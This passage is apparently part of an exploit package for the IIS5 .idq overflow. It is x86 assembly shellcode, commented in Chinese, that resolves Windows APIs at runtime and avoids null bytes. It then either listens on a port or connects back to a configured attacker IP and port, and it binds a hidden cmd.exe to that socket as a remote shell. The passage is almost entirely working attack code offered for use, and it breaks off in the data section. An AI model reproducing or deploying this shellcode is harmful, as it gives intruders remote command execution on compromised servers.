#endif //_SNAKE_SHELLCODE_FUNC_HEADER_2001_7_11

文件4.iis_idq.asm --shellcode的汇编代码(编译不需要)

;//IIS5_idq.asm

.386p

.model flat,c

;//下面定义 连接 信息 结构.

stConnectInfo struct

byConnectType db 0 ;//=1, 监听; =2,连结外部ip/port.

byReserv1 db 1 ;//nothing just for Word Adjusted.

dwReserv1 dw 1 ;//nothing just for Word Adjusted.

dwListenPort dd 0 ;//DDWORD dwIP1+dwIP2;

dwIP1 dd 0 ;// //IP 和端口,一位用2位表示. 高位为类型,低位为值.

dwIP2 dd 0 ;// 1.高位 =1, 低位为普通value.

dwConnectPort dd 0 ;// 2.高位 = 2, 低位 应该 = value -1

stConnectInfo ends

;//用到的函数 结构

SkOverflowFuncAddr struct

TerminateProcess dd 0;

CreatePipe dd 0;

GetStartupInfoA dd 0;

CreateProcessA dd 0;

PeekNamedPipe dd 0;

GlobalAlloc dd 0;

WriteFile dd 0;

ReadFile dd 0;

Sleep dd 0;

ExitProcess dd 0;

GetLastError dd 0;

DuplicateHandle dd 0;

GetCurrentProcess dd 0;

CloseHandle dd 0;

socket dd 0;

bind dd 0;

listen dd 0;

accept dd 0;

send dd 0;

recv dd 0;

setsockopt dd 0;

WSAStartup dd 0;

closesocket dd 0;

connect dd 0;

gethostname dd 0;

SkOverflowFuncAddr ends

STARTUPINFO struct

cb dd 0;

lpReserved dd 0;

lpDesktop dd 0;

lpTitle dd 0;

dwX dd 0;

dwY dd 0;

dwXSize dd 0;

dwYSize dd 0;

dwXCountChars dd 0;

dwYCountChars dd 0;

dwFillAttribute dd 0;

dwFlags dd 0;

wShowWindow dw 0;

cbReserved2 dw 0;

lpReserved2 dd 0;

hStdInput dd 0;

hStdOutput dd 0;

hStdError dd 0;

STARTUPINFO ends

PROCESS_INFORMATION struct

hProcess dd 0;

hThread dd 0;

dwProcessId dd 0;

dwThreadId dd 0;

PROCESS_INFORMATION ends;

;//管套 - 命令交互 结构

Shell_Cmd_Pipe struct

hReadPipe dd 0;

ShellStdoutPipe dd 0;

hWritePipe dd 0;

ShellStdinPipe dd 0;

msocket dd 0;

ProcessInformation PROCESS_INFORMATION <>;

nstartupinfo STARTUPINFO <>;

Shell_Cmd_Pipe ends

SIZE_OF_TEMP_BUFFER equ 0f0h

;//接受,写管套数据结构.

Recv_Write_Socket_Pipe_Data struct

szTemp db SIZE_OF_TEMP_BUFFER dup(0)

dwBreak DD 0

dwTemp DD 0

Recv_Write_Socket_Pipe_Data ends;

SOCKADDR_IN struct

sin_family dw 0;

sin_port dw 0;

sin_addr dd 0;

sin_zero db 8 dup(0);

SOCKADDR_IN ends

SECURITY_ATTRIBUTES struct

nLength DD 0;

lpSecurityDescriptor DD 0;

bInheritHandle DD 0;

SECURITY_ATTRIBUTES ends;

FUNC_PARAM_1 equ [ebp+8]

FUNC_PARAM_2 equ [ebp+0ch]

FUNC_PARAM_3 equ [ebp+10h]

FUNC_PARAM_4 equ [ebp+14h]

FUNC_PARAM_5 equ [ebp+18h]

FUNC_PARAM_6 equ [ebp+1ch]

FUNC_PARAM_7 equ [ebp+20h]

SO_RCVTIMEO equ 1006h ;// receive timeout

SOL_SOCKET equ 0ffffh ;// options for socket level

Shell_Cmd_Pipe_OFFSET equ 3f0h

SkOverflowFuncAddr_OFFSET equ 2d0h

szShellNeedFunc_OFFSET equ 1d0h

.code

public _sk_Bind_ConnectShellCode

public _GetDataSetOffset_Value

start:

_sk_Bind_ConnectShellCode proc

push ebp;

mov ebp, esp;

;//产生 0x800的堆栈 空间.

xor eax,eax;

inc eax;

shl eax, 0bh; //=>0x800

sub esp, eax;

jmp call_back;

nop;

jump_next:

jmp run_actual1;

call_back:

call jump_next;

call_back_Data_Offset:

;//jmp quit_return; //not run here as no necessary.

;//(void *ptr, int iLen, DWORD dwOld, DWORD dwNew)

_Convert_Add_Sign_To_Null_Sign:

push ebp;

mov ebp, esp;

push edi;

push ecx;

push eax;

push edx;

mov edi, FUNC_PARAM_1; //第1个参数.

mov ecx, FUNC_PARAM_2; //第2个参数.

mov eax, FUNC_PARAM_3; //第3个参数.

mov edx, FUNC_PARAM_4; //第4个参数.

;//重复查找,替换,直到cx = 0

NextAddSign:

repnz scasb;

jcxz Finish_Replace_Add_Sign;

dec edi;

mov byte ptr [edi], dl;

inc ecx;

jmp NextAddSign;

Finish_Replace_Add_Sign:

pop edx;

pop eax;

pop ecx;

pop edi;

pop ebp;

ret;

;//转换eax的long -> ax 标准word.

;//rule: 1.高位 =1, 低位为普通value.

;// 2.高位 = 2, 低位 应该 = value -1

_convert_Sk_Long_To_Ansi_Word:

push ebx;

push ecx;

push edx;

xor edx, edx;

push eax; //低位 ->ebx

pop ebx;

shr ebx, 10h;

push eax; //高位 -> ecx

pop ecx;

_Convert_bx_To_al_Short:

;//处理ebx.

cmp bh, 1;

je _convert_Sk_Long_IsNormal;

dec bl;

_convert_Sk_Long_IsNormal:

mov al, bl;

test edx, edx;

jnz Finish_Convert_Next_Bit;

shl eax, 8;

push ecx;

pop ebx;

inc edx;

jmp _Convert_bx_To_al_Short

Finish_Convert_Next_Bit:

pop edx;

pop ecx;

pop ebx;

ret;

run_actual1:

jmp run_actual2;

;//从 szShellNeedFunc 取得 SkOverflowFuncAddr的地址

;//void _Get_Overflow_Addr_From_Shell_Func( void *SkOverflowFuncAddr,

;// char *ShellNeedFuncStr,

;// DWORD dwGetModuleHandleAddr,

;// DWORD dwGetProcAddr)

;

_Get_Overflow_Addr_From_Shell_Func:

push ebp;

mov ebp, esp;

push esi;

push edi;

push edx;

push ecx;

push ebx;

push eax;

mov edi, FUNC_PARAM_1; //第1个参数

mov esi, FUNC_PARAM_2; //第2个参数

xor ebx,ebx;

xor ecx,ecx;

mov cl,SHELL_NEED_FUNC_BODY_OFFSET;

add esi, ecx; //esi = szShellCodeNeedFunc+SHELL_NEED_FUNC_BODY_OFFSET

mov cl, byte ptr [esi];

inc esi;

_NextDllNameToLoad:

push ecx;

mov bl, byte ptr [esi];

inc esi; //skip size.

push esi;

mov eax, FUNC_PARAM_3; //第3个参数.

;//mov eax, GetModuleHandleA_Addr; //GetModuleHandleA

call eax;

add esi, ebx; //go to next address.

;//现在,esi指向 函数 数目.

xor ecx, ecx;

mov cl, byte ptr [esi];

inc esi;

;//现在,load每个function.

_NextFunction_Addr:

push ecx;

;//取字符串的大小

mov bl, byte ptr [esi];

inc esi;

push eax;

push esi;

push esi; //procName

push eax; //module

mov ecx, FUNC_PARAM_4; //第3个参数.

;//mov eax, GetModuleHandleA_Addr; //GetModuleHandleA

call ecx;

mov dword ptr [edi], eax;

add edi, 4;

pop esi;

pop eax;

add esi, ebx; //指针移动到下一个字符串.

pop ecx;

loop _NextFunction_Addr;

pop ecx;

loop _NextDllNameToLoad;

pop eax;

pop ebx;

pop ecx;

pop edx;

pop edi;

pop esi;

pop ebp;

ret;

run_actual2:

jmp run_actual3_1;

;//创建 一个管套,监听一个端口,返回该管套.

;//SOCKET _Create_Bind_Connect_Socket_To_Port( SkOverflowFuncAddr *pFuncAddr, szShellNeedFunc *pNeedFunc);

_Create_Bind_Connect_Socket_To_Port:

push ebp;

mov ebp, esp;

xor eax, eax; //开辟0xff(256)个byte的变量区域.

mov ax, 3f0h

sub esp, eax;

push esi;

push edi;

push edx;

push ecx;

push ebx;

mov esi, FUNC_PARAM_1; //第一个参数.

;//WSAStartup(werd,&wsd);

lea edi, [ebp-340h]; //开辟个空间做临时变量.

xor eax, eax;

mov al,2;

push edi;

push eax;

mov eax, [esi+SkOverflowFuncAddr.WSAStartup];

call eax;

;//msocket = socket( AF_INET, SOCK_STREAM, 0); = (2,1,0)

xor eax, eax;

push eax;

inc eax;

push eax;

inc eax;

push eax;

mov eax, [esi+SkOverflowFuncAddr.socket];

call eax;

;//取连结类型

mov edx, FUNC_PARAM_2;

lea ebx, [edx+stConnectInfo.byConnectType];

mov cl, BYTE PTR [ebx];

push eax;

;//准备参数 SOCKADDR_IN

lea edi, [ebp-0f0h]; //现在是sockaddr_in的地址.

lea ebx, [edi + SOCKADDR_IN.sin_family];

xor eax, eax;

mov al,2;

mov word ptr [ebx], ax; //SOCKADDR_IN.sin_family = AF_INET

pop eax;

;//现在寄存器状况..

;//edi --- 临时变量 sockaddr_in, (sin_family = AF_INET 被赋值)

;//edx --- 参数2 stConnectInfo 连结信息

;//eax --- 创建的管套 newsocket.

;//esi --- 参数1 SkOverflowFuncAddr 函数地址.

cmp cl,1 ;//是监听吗?

jne _IsConnectToIP; //no. 跳转.

push eax; // <-2@

;//取得端口value.

push eax; // <-1@

mov eax, [edx+stConnectInfo.dwListenPort];

call _convert_Sk_Long_To_Ansi_Word;

mov ecx, eax;

xchg ch,cl; //port = htons(port)

pop eax; // ->1@

lea ebx, [edi + SOCKADDR_IN.sin_port];

mov edx, FUNC_PARAM_2; //第2个参数.

mov word ptr [ebx], cx; //SOCKADDR_IN.sin_port = port.

xor eax, eax;

lea ebx, [edi + SOCKADDR_IN.sin_addr];

mov dword ptr [ebx], eax; //SOCKADDR_IN.sin_addr.S_un.S_addr = INADDR_ANY

pop eax; // ->2@

push eax; //<-3@

;//bind( msocket, (SOCKADDR *)&addrin, sizeof(addrin));

xor ecx, ecx;

mov cl, size sockaddr_in;

push ecx;

push edi;

push eax;

mov eax, [esi+SkOverflowFuncAddr.bind];

call eax;

;//下面的跳转,用来消去 距离太远造成的0. 对源程序没有影响的代码.

jmp _temp_1;

run_actual3_1:

jmp run_actual3_2;

_temp_1:

pop eax; //->3@

push eax; //<-4@

;//listen( msocket, 1);

xor ecx, ecx;

inc ecx;

push ecx;

push eax;

mov eax, [esi+SkOverflowFuncAddr.listen];

call eax;

pop eax; //->4@

push eax; //<-5@

;//newsocket = accept( msocket, (SOCKADDR*)&addrin, &iLen);

xor ecx, ecx;

mov cl, size sockaddr_in;

lea edi, [ebp-0c0h];

mov [edi], ecx;

push edi; //iLen = sizeof(addrin);

lea edi, [ebp-0f0h];

push edi; //&SOCKADDR_IN 结构.

push eax;

mov eax,[esi+SkOverflowFuncAddr.accept];

call eax;

pop edx; //->5@ //用来listen的socket.由eax->edx

push eax; //<-6@ //得到新的连结管套..

;//关闭 用来 listen的socket.

;//closesocket( msocket);

push edx;

mov eax, [esi+SkOverflowFuncAddr.closesocket];

call eax;

pop eax; //->6@

cmp eax, -1;

je WSocket_QuitRightNow;

jmp Finish_Get_Connection_Socket;

_IsConnectToIP: ;//连接到一个ip:port

;//addrin.sin_family = AF_INET;

;//addrin.sin_addr.S_un.S_addr = 0x0100007f;

;//addrin.sin_port = 0x8b; //139.

;//connect( socket, (SOCKADDR*)&addrin, sizeof(addrin));

;//准备参数 SOCKADDR_IN

;//现在寄存器状况..

;//edi --- 临时变量 sockaddr_in, (sin_family = AF_INET 被赋值)

;//edx --- 参数2 stConnectInfo 连结信息

;//eax --- 创建的管套 newsocket.

;//esi --- 参数1 SkOverflowFuncAddr 函数地址.

;//取得端口value.

push eax; //<-1@

mov eax, [edx+stConnectInfo.dwConnectPort];

call _convert_Sk_Long_To_Ansi_Word;

mov ecx, eax;

xchg ch,cl; //port = htons(port)

lea ebx, [edi + SOCKADDR_IN.sin_port];

mov word ptr [ebx], cx; //SOCKADDR_IN.sin_port = port.

;//下面的跳转,用来消去 距离太远造成的0. 对源程序没有影响的代码.

jmp _temp_1_1;

run_actual3_2:

jmp run_actual3;

_temp_1_1:

mov eax, [edx+stConnectInfo.dwIP1];

call _convert_Sk_Long_To_Ansi_Word;

mov ecx, eax;

shl ecx, 10h;

mov eax, [edx+stConnectInfo.dwIP2];

call _convert_Sk_Long_To_Ansi_Word;

mov cx, ax;

lea ebx, [edi + SOCKADDR_IN.sin_addr];

mov dword ptr [ebx], ecx; //SOCKADDR_IN.sin_addr.S_un.S_addr = stConnectInfo.dwIP1 + dwIP2

pop eax; //->1@

push eax; //<-2@

;//connect(msocket, addr, 0x10);

xor ecx, ecx;

mov cl, 10h;

push ecx; //sizeof(SOCKADDR_IN);

push edi; //SOCKADDR *

push eax; //msocket.

mov eax, [esi+SkOverflowFuncAddr.connect];

call eax; //connect.

mov ecx, eax;

pop eax; //->2@

jcxz Finish_Get_Connection_Socket; //connect success.

nop;

;//now, connect failure.

;//closesocket(eax)

push eax;

mov eax, [esi+SkOverflowFuncAddr.closesocket];

call eax;

xor eax, eax;

jmp WSocket_QuitRightNow;

Finish_Get_Connection_Socket:

push eax;

push eax;

pop edx; //edx = eax

;// setsockopt( newsocket, SOL_SOCKET, SO_RCVTIMEO, (LPCTSTR)&iLen, sizeof(iLen));

lea edi, [ebp-0f0h];

xor eax, eax;

mov al, 1;

mov [edi], eax;

shl eax, 2; //eax = 4

push eax;

push edi;

mov ax, SO_RCVTIMEO;

push eax;

mov ax, SOL_SOCKET;

push eax;

push edx;

mov eax, [esi+SkOverflowFuncAddr.setsockopt];

call eax;

pop eax;

WSocket_QuitRightNow:

;//返回结果.

pop ebx;

pop ecx;

pop edx;

pop edi;

pop esi;

mov esp, ebp;

pop ebp;

ret;

run_actual3:

jmp run_actual4_1;

;//在管套 pipe 上,运行进程 pStrCmd;

;//_Create_Process_To_Handle( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe, LPCTSTR *pStrCmd);

_Create_Process_To_Handle:

push ebp;

mov ebp, esp;

push edi;

push esi;

push edx;

push ecx;

push ebx;

push eax;

mov edi, FUNC_PARAM_2; //Shell_Cmd_Pipe *pCmdPipeData;

push edi;

pop edx; //edx = edi;

;//memset( &si, 0, sizeof(STARTUPINFO));

xor eax, eax;

lea edi, [edi +Shell_Cmd_Pipe.nstartupinfo];

push edi; //edi = &STARTUPINFO; ---

xor ecx, ecx;

mov cl, size STARTUPINFO;

rep stosb;

pop edi; // ---

;//si.cb = sizeof(STARTUPINFO);

lea esi, [edi + STARTUPINFO.cb];

mov cl, size STARTUPINFO;

mov [esi], ecx;

;//si.wShowWindow = SW_HIDE = 0; //need to do nothing.

;//si.dwFlags = STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW;

lea esi, [edi + STARTUPINFO.dwFlags];

mov cx, 101h;

mov [esi], ecx;

;//si.hStdInput = ShellStdinPipe;

push edi;

lea edi, [edi + STARTUPINFO.hStdInput];

lea esi, [edx + Shell_Cmd_Pipe.ShellStdinPipe];

mov eax, [esi];

mov [edi], eax;

pop edi;

;//si.hStdOutput = ShellStdoutPipe;

push edi;

lea edi, [edi+STARTUPINFO.hStdOutput];

lea esi, [edx+Shell_Cmd_Pipe.ShellStdoutPipe];

mov eax, [esi];

mov [edi], eax;

pop edi;

;// DuplicateHandle( GetCurrentProcess(), ShellStdoutPipe, GetCurrentProcess(),

;// &(si.hStdError),DUPLICATE_SAME_ACCESS, TRUE, 0);

mov esi, FUNC_PARAM_1;

mov eax, [esi+SkOverflowFuncAddr.GetCurrentProcess];

call eax;

xor ecx, ecx;

push ecx; //0

inc ecx;

push ecx; //TRUE

inc ecx;

push ecx; //DUPLICATE_SAME_ACCESS

lea edx, [edi+STARTUPINFO.hStdError];

push edx; //&(si.hStdError)

push eax; //GetCurrentProcess();

push esi;

mov esi, FUNC_PARAM_2;

lea esi, [esi+Shell_Cmd_Pipe.ShellStdoutPipe];

mov ebx, [esi];

pop esi;

;//下面的跳转,用来消去 距离太远造成的0. 对源程序没有影响的代码.

jmp _temp_2;

run_actual4_1:

jmp run_actual4;

_temp_2:

push ebx; //ShellStdoutPipe

push eax; //GetCurrentProcess();

mov eax, [esi+SkOverflowFuncAddr.DuplicateHandle];

call eax;

;// CreateProcess( NULL, "cmd.exe", NULL, NULL, TRUE, 0,

;// NULL, NULL, &si, &ProcessInformation )

xor eax, eax;

mov edi, FUNC_PARAM_2;

lea edx, [edi+Shell_Cmd_Pipe.ProcessInformation];

push edx; ;//&ProcessInformation

lea edx, [edi+Shell_Cmd_Pipe.nstartupinfo];

push edx; ;//&si

push eax; ;//NULL;

push eax; ;//NULL;

push eax; ;//0;

inc eax;

push eax; ;//TRUE;

dec eax;

push eax; ;//NULL;

push eax; ;//NULL;

mov edx, FUNC_PARAM_3;

push edx; ;//LPCTSTR lpszCommand.

push eax; ;//NULL;

mov eax, [esi+SkOverflowFuncAddr.CreateProcessA];

call eax;

;//CloseHandle( ShellStdinPipe);

mov eax, [edi+Shell_Cmd_Pipe.ShellStdinPipe];

push eax;

mov eax, [esi+SkOverflowFuncAddr.CloseHandle];

call eax;

;//CloseHandle( ShellStdoutPipe);

mov eax, [edi+Shell_Cmd_Pipe.ShellStdoutPipe];

push eax;

mov eax, [esi+SkOverflowFuncAddr.CloseHandle];

call eax;

pop eax;

pop ebx;

pop ecx;

pop edx;

pop esi;

pop edi;

mov esp, ebp;

pop ebp;

ret;

;//memset( &si, 0, sizeof(STARTUPINFO));

run_actual4:

jmp run_actual5;

;//关闭不再用的管套

;//_Close_All_Communication_Pipe(SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);

_Close_All_Communication_Pipe:

push ebp;

mov ebp, esp;

push esi;

push edi;

push edx;

push ecx;

push ebx;

push eax;

mov esi, FUNC_PARAM_1;

mov edi, FUNC_PARAM_2;

;//closesocket(msocket);

mov eax, [edi+Shell_Cmd_Pipe.msocket];

push eax;

mov eax, [esi+SkOverflowFuncAddr.closesocket];

call eax;

;//closehandle(handle)..

mov eax, [edi+Shell_Cmd_Pipe.hReadPipe];

push eax;

mov eax, [esi+SkOverflowFuncAddr.CloseHandle];

call eax;

;//closehandle(handle)..

mov eax, [edi+Shell_Cmd_Pipe.hWritePipe];

push eax;

mov eax, [esi+SkOverflowFuncAddr.CloseHandle];

call eax;

pop eax;

pop ebx;

pop ecx;

pop edx;

pop edi;

pop esi;

mov esp, ebp;

pop ebp;

ret;

run_actual5:

jmp run_actual6_1;

;//接受管套的数据,写进pipe,读pipe,发送到socket.

;//_Recv_Write_Socket_Pipe( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);

_Recv_Write_Socket_Pipe:

push ebp;

mov ebp, esp;

xor eax, eax;

mov ax, 2f0h;

sub esp, eax; // 496bytes, use for char szTemp[240];

push esi;

push edi;

push edx;

push ecx;

push ebx;

mov esi, FUNC_PARAM_1; //SkOverflowFuncAddr *pAddr;

mov edi, FUNC_PARAM_2; //Shell_Cmd_Pipe *pCmdPipeData;

;//dwBreak = 1

lea edx, [ebp - size Recv_Write_Socket_Pipe_Data + Recv_Write_Socket_Pipe_Data.dwBreak];

xor eax, eax;

inc eax;

mov [edx], eax;

;//while(!bBreak)

_While_Read_Data_Loop:

;//监测 dwBreak == 0?

lea edx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwBreak];

mov eax, [edx];

test eax, eax;

jz _Quit_While_Read_Data_Loop_1;

;//iLen = recv( newsocket, szTemp, sizeof(szTemp)-1, 0);

xor eax, eax;

push eax;

mov al, SIZE_OF_TEMP_BUFFER;

push eax;

lea eax, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.szTemp];

push eax;

lea ebx, [edi+Shell_Cmd_Pipe.msocket];

mov eax, [ebx];

push eax;

mov eax, [esi+SkOverflowFuncAddr.recv];

call eax;

cmp eax, -1;

jne _NextStep_Receive_Test;

push eax;

pop edx;

mov eax, [esi+SkOverflowFuncAddr.GetLastError];

call eax;

cmp ax, 10060; //timeout?

je _Read_StdoutPipe;

_Quit_While_Read_Data_Loop_1:

jmp _Quit_While_Read_Data_Loop; //error.

_NextStep_Receive_Test:

test eax, eax; //eax == 0?

je _Quit_While_Read_Data_Loop; //break;

jng _Read_StdoutPipe;

;//Receive_Ok_Occure:

;//if( iLen > 0)

;//WriteFile( hWritePipe, szTemp, iLen, &dwTemp, NULL)

xor edx, edx;

push edx; //NULL

lea ebx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwTemp];

push ebx; //&dwTemp

push eax; //iLen

lea ebx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.szTemp];

push ebx; //szTemp;

mov eax, [edi+Shell_Cmd_Pipe.hWritePipe];

push eax;

mov eax, [esi+SkOverflowFuncAddr.WriteFile];

call eax;

test eax, eax;

jz _Quit_While_Read_Data_Loop; //WriteFile(..) == 0, 失败,管套中断.

;//下面的跳转,用来消去 距离太远造成的0. 对源程序没有影响的代码.

jmp _temp_3;

run_actual6_1:

jmp run_actual6;

_temp_3:

_Read_StdoutPipe:

;//PeekNamedPipe(hReadPipe,NULL,0,NULL,&dwTemp,NULL );

xor eax, eax;

push eax; //NULL

lea edx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwTemp];

push edx; //&dwTemp

push eax; //NULL

push eax; //0

push eax; //NULL

mov eax, [edi+Shell_Cmd_Pipe.hReadPipe];

push eax; //hReadPipe

mov eax, [esi+SkOverflowFuncAddr.PeekNamedPipe];

call eax;

mov eax, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwTemp];

test eax, eax;

jz _No_Data_To_Read_Yet;

;//ReadFile( hReadPipe, szTemp, sizeof(szTemp), &dwTemp, NULL)

xor eax, eax;

push eax; //NULL

lea edx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwTemp];

push edx; //&dwTemp

mov al, SIZE_OF_TEMP_BUFFER;

push eax; //sizeof(szTemp);

lea edx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.szTemp];

push edx; //szTemp;

mov eax, [edi+Shell_Cmd_Pipe.hReadPipe];

push eax; //hReadPipe

mov eax, [esi+SkOverflowFuncAddr.ReadFile];

call eax; //ReadFile.

;//if( ReadFile (...) == 0)? then quit.

test eax, eax;

je _Quit_While_Read_Data_Loop;

;//send( newsocket, szTemp, dwTemp, 0);

xor eax, eax;

push eax; //0

mov eax, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwTemp];

push eax; //dwTemp;

lea edx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.szTemp];

push edx; //szTemp;

mov eax, [edi+Shell_Cmd_Pipe.msocket];

push eax; //socket.

mov eax, [esi+SkOverflowFuncAddr.send];

call eax;

cmp eax, -1;

je _Quit_While_Read_Data_Loop;

jmp _Read_StdoutPipe; //continue to read next data.

_No_Data_To_Read_Yet:

jmp _While_Read_Data_Loop;

_Quit_While_Read_Data_Loop:

pop ebx;

pop ecx;

pop edx;

pop edi;

pop esi;

mov esp, ebp;

pop ebp;

ret;

run_actual6:

jmp run_actual;

;//BOOL _Create_Two_Pipe( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);

_Create_Two_Pipe:

push ebp;

mov ebp, esp;

xor eax, eax;

mov al, 0f0h;

sub esp, eax; //开辟空间

push esi;

push edi;

push edx;

push ecx;

push ebx;

mov esi, FUNC_PARAM_1;

mov edi, FUNC_PARAM_2;

xor ebx,ebx;

lea edi, [ebp-10h];

;//SecurityAttributes.lpSecurityDescriptor = NULL; //default ACL

lea edx, [edi+SECURITY_ATTRIBUTES.lpSecurityDescriptor];

mov [edx], ebx;

;//SecurityAttributes.bInheritHandle = TRUE; //will inherit handle

lea edx, [edi+SECURITY_ATTRIBUTES.bInheritHandle];

inc ebx;

mov [edx], ebx;

;//SecurityAttributes.nLength = sizeof(SECURITY_ATTRIBUTES);

lea edx, [edi+SECURITY_ATTRIBUTES.nLength];

mov bl, size SECURITY_ATTRIBUTES;

mov [edx], ebx;

xor ebx, ebx;

;//bResult = CreatePipe( &hReadPipe, &ShellStdoutPipe, &SecurityAttributes, 0);output into _FUNC_PARAM_2's variables.

push edi; //save.

push ebx; //0

push edi; //&SecurityAttributes

mov edi, FUNC_PARAM_2;

lea edx, [edi+Shell_Cmd_Pipe.ShellStdoutPipe];

mov [edx], ebx; //ShellStdoutPipe = 0;

push edx; //&ShellStdoutPipe

lea edx, [edi+Shell_Cmd_Pipe.hReadPipe];

push edx;; //&hReadPipe

mov eax, [esi+SkOverflowFuncAddr.CreatePipe];

call eax;

pop edi; //restore.

test eax, eax;

je _Create_Pipe_Quit_Error;

;//Create Second Pipe.

;//CreatePipe( &ShellStdinPipe, &hWritePipe, &SecurityAttributes, 0);

xor ebx, ebx;

push ebx; //0

push edi; //&SecurityAttributes

mov edi, FUNC_PARAM_2;

lea edx, [edi+Shell_Cmd_Pipe.hWritePipe];

push edx; //&hWritePipe

lea edx, [edi+Shell_Cmd_Pipe.ShellStdinPipe];

mov [edx],ebx;

push edx; //&ShellStdinPipe

mov eax, [esi+SkOverflowFuncAddr.CreatePipe];

call eax;

test eax, eax;

je _Create_Pipe_Quit_Error;

xor eax, eax;

inc eax;

jmp _Create_Pipe_Quit;

_Create_Pipe_Quit_Error:

xor eax, eax;

jmp _Create_Pipe_Quit;

nop;

_Create_Pipe_Quit:

pop ebx;

pop ecx;

pop edx;

pop edi;

pop esi;

mov esp, ebp;

pop ebp;

ret;

run_actual:

lea esi, [esp];

mov esi, [esi]; //ebx 是调用代码的地址

xor ecx, ecx;

mov cx,MyDataOffset;

add esi, ecx; //esx 是未来 数据的地址.

;//ebp-0x2ff 处,是 szShellNeedFunc结构.

lea edi, [ebp - szShellNeedFunc_OFFSET];

push edi;

;//MyDebugAdd -----

mov cx, _size_AllData;

rep movsb;

;//还要包括 连接信息结构 的数据

pop edi;

push edi;

;//将'+'转换成 "\x00"

;//void _Convert_Add_Sign_To_Null_Sign(void *ptr, int iLen, DWORD dwOld, DWORD dwNew);

xor ecx, ecx;

push ecx; //---参数4

mov cl, '+';

push ecx; //---参数3

mov cx, _size_szShellNeedFunc;

push ecx; //---参数2

xor ebx, ebx;

mov bl, String_Of_Data_Offset;

add edi, ebx; //edi指向 真正的 szShellNeedFunc

push edi; //---参数1

call _Convert_Add_Sign_To_Null_Sign;

add esp, 10h;

;//从 szShellNeedFunc 取得 SkOverflowFuncAddr的地址

;//void _Get_Overflow_Addr_From_Shell_Func( SkOverflowFuncAddr *pSkOverflowFuncAddr, char *ShellNeedFuncStr, DWORD dwGetModuleHandleAddr, DWORD GetProcAddr)

xor ecx, ecx;

mov cx, _GetModuleHandle_Addr_Offset;

mov esi, edi;

add esi, ecx;

mov eax, [esi+4]

push eax; ;//GetProcAddress_Addr

mov eax, [esi];

push eax; ;//GetModuleHandle_Addr

push edi;

;//ebp-0x1ff处,是 SkOverflowFuncAddr结构.

lea esi, [ebp-SkOverflowFuncAddr_OFFSET];

push esi;

call _Get_Overflow_Addr_From_Shell_Func;

add esp, 10h;

pop edi;

;//创建 一个管套,监听一个端口/连接到一个ip:port,返回该管套.

;//SOCKET _Create_Bind_Connect_Socket_To_Port( SkOverflowFuncAddr *pFuncAddr, szShellNeedFunc *pNeedFunc);

push edi;

push esi;

call _Create_Bind_Connect_Socket_To_Port;

add esp, 8;

test eax, eax;

jz Main_Quit_Now; //socket 失败.

lea edi, [ebp-Shell_Cmd_Pipe_OFFSET];

lea ebx, [edi + Shell_Cmd_Pipe.msocket];

mov [ebx], eax; //保存结果到 msocket中.

;//BOOL _Create_Two_Pipe( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);

;//创建2个pipe,用来绑定shell.

push edi;

push esi;

call _Create_Two_Pipe;

add esp, 8;

test eax, eax;

jz Main_Quit_Now;

;//now is ok.

;//在管套 pipe 上,运行进程 pStrCmd;

;//_Create_Process_To_Handle( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe, LPCTSTR *pStrCmd);

lea edi, [ebp-szShellNeedFunc_OFFSET];

xor eax,eax;

mov al, String_Of_Data_Offset; //cmd.exe命令行在数据中的偏移.

add edi, eax;

push edi; //"cmd.exe"的指针

lea edi, [ebp-Shell_Cmd_Pipe_OFFSET];

push edi;

push esi;

call _Create_Process_To_Handle;

add esp, 0ch;

;//接受管套的数据,写进pipe,读pipe,发送到socket.

;//_Recv_Write_Socket_Pipe( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);

push edi;

push esi;

call _Recv_Write_Socket_Pipe;

add esp, 8;

;//关闭不再用的管套

;//_Close_All_Communication_Pipe(SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);

push edi;

push esi;

call _Close_All_Communication_Pipe

add esp, 8;

;//关闭该进程

xor eax, eax;

push eax;

lea edx, [edi+Shell_Cmd_Pipe.ProcessInformation];

mov eax, [edx+PROCESS_INFORMATION.hProcess];

push eax;

mov eax, [esi+SkOverflowFuncAddr.TerminateProcess];

call eax;

Main_Quit_Now: ;//现在推出..

;//exit now.

xor eax, eax;

push eax;

mov eax, [esi+ SkOverflowFuncAddr.ExitProcess];

call eax;

ret;

;//quit_return:

;//恢复堆栈

mov esp,ebp;

pop ebp;

nop;

nop;

;//下面是数据:

MyDataOffset equ $-call_back_Data_Offset; //call 函数,到这里的距离.

ConnectTypeOffset equ $-start;

ListenPortOffset equ ConnectTypeOffset+stConnectInfo.dwListenPort;

ConnectIP1Offset equ ConnectTypeOffset+stConnectInfo.dwIP1;

ConnectIP2Offset equ ConnectTypeOffset+stConnectInfo.dwIP2;

ConnectPortOffset equ ConnectTypeOffset+stConnectInfo.dwConnectPort;

MyConnectInfo stConnectInfo < 2, 0ffh, 0ffffh, 02010151h, 01250201h, 01a801c0h, 02010158h>

String_Of_Data_Offset equ $-MyConnectInfo;

ExecCommandOffset equ $-start;

szShellNeedFunc db 'cmd.exe+++++++++'

db '++++++++++++++++'

db '++++++++++++++++'

db '++++++++++++++++'

db '++++++++++++++++'

